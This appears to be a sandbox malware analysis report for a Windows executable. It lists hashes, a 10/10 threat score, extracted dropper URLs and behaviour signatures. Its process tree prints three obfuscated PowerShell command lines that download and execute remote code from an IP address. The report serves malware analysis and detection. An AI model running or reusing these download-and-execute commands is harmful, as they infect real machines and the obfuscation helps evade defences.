Overview

overview

10

Static

static

3

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    04/07/2024, 09:15

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    36KB

  • MD5

    92d4e2ef88e5aafb72ddde13e84b549a

  • SHA1

    24ddd5e2c7e96e52e00f5a6e2b29e4b100d0c578

  • SHA256

    a77d96f186d1cc96dc589f4a6d55b45c9c04c77072fd504a720f437412ff93cb

  • SHA512

    af4822dafe72de541134b80d00b5fa2b1539a0c82b1261854fb15f24ec7cdf3e34791e19915dab32b132c6e6e58760f4c599d532fcb220f89e941cb065e28c6f

  • SSDEEP

    384:4b9oKDQckRKDVbJapdKDGPGAtyfc1FKDGPGAIpEKDVbJrkiKDQ:M90PGeD1ZPGv9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://85.28.47.8/x/L.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://85.28.47.8/x/M.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://85.28.47.8/S.png

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1704
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/x/L.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1852
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/x/M.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2616
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://85.28.47.8/S.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2336

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          Filesize

          7KB

          MD5

          a95be2e8791464fbff50e740ade31c62

          SHA1

          4b722637610f4cd1beea5e46bfb70053f5917043

          SHA256

          684dd83494ac8cf3597cbb2a795fa711e91b1f4ce31426359914dccda04acd6a

          SHA512

          8637455c7ebf1cb5505d1c19ec2a9c67cd320cfc77c41e55957d5ff045a1b35aebb485d5c3c137f1d8b61d9e6bacea8543eb438351e6b597e726bc701f44b589

          Download Submit